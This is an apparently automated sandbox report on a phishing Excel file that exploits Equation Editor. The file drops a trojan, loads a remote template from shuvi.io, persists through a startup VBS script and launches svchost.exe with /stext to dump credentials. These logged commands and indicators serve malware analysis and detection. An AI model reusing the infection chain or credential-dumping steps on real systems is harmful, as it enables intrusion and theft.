Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: bhv35FF.tmp.13.dr

Binary or memory string: org.slneighbors

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@20/40@9/5

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0021A0F4 GetLastError,FormatMessageW,

10_2_0021A0F4

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_002084F3 AdjustTokenPrivileges,CloseHandle,	10_2_002084F3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_00208AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	10_2_00208AA3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012B84F3 AdjustTokenPrivileges,CloseHandle,	11_2_012B84F3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012B8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_012B8AA3

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 11_2_012CB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

11_2_012CB3BF

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0022EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_0022EF21

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0021C423 CoInitialize,CoCreateInstance,CoUninitialize,

10_2_0021C423

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001B4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

10_2_001B4FE9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\68730000

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-FI789R

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRA0B1.tmp

Jump to behavior

Source: PO-00006799868.xls	OLE indicator, Workbook stream: true
Source: 68730000.0.dr	OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: C:\Windows\SysWOW64\svchost.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.1055411856.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000E.00000002.474748620.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 0000000C.00000002.1055392882.0000000003260000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.467967454.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: PO-00006799868.xls	ReversingLabs: Detection: 13%
Source: PO-00006799868.xls	Virustotal: Detection: 14%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: shcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: PO-00006799868.xls

Static file information: File size 1094656 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: 68730000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: PO-00006799868.xls

Initial sample: OLE indicators encrypted = True

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_0022C104 LoadLibraryA,GetProcAddress,

10_2_0022C104

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_0065FA2C push 00000045h; ret	9_2_0065FA33
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_0066C301 pushad ; ret	9_2_0066C339
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_0066C789 push esp; ret	9_2_0066C795
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE20A push esi; retf	10_3_02ADE20D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE6C2 push 7E000BC3h; ret	10_3_02ADE6D1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE7F2 push cs; ret	10_3_02ADE8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE4C8 push ss; iretd	10_3_02ADE581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE596 push ss; iretd	10_3_02ADE581
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE8E8 push cs; ret	10_3_02ADE8CD
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE8E4 pushfd ; retn 000Bh	10_3_02ADE8E5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE8F4 push eax; retn 000Bh	10_3_02ADE8F5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02ADE900 push ds; retn 000Bh	10_3_02ADE945
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A5B988 push eax; retn 0040h	10_3_02A5B999
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_3_02A77EC5 push ecx; ret	10_3_02A77ED8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001BC590 push eax; retn 001Bh	10_2_001BC599
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001D8AC5 push ecx; ret	10_2_001D8AD8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01288AC5 push ecx; ret	11_2_01288AD8

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\shuvi.io@SSL\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\shuvi.io@SSL\DavWWWRoot			Jump to behavior

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File dump: wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 96632497.doc.4.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	File created: C:\Users\user\AppData\Local\directory\name.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\taskhostw.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 10_2_001B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_001B4A35
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01264A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	11_2_01264A35
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_012E53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	11_2_012E53DF

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 10_2_001D3307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_001D3307

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
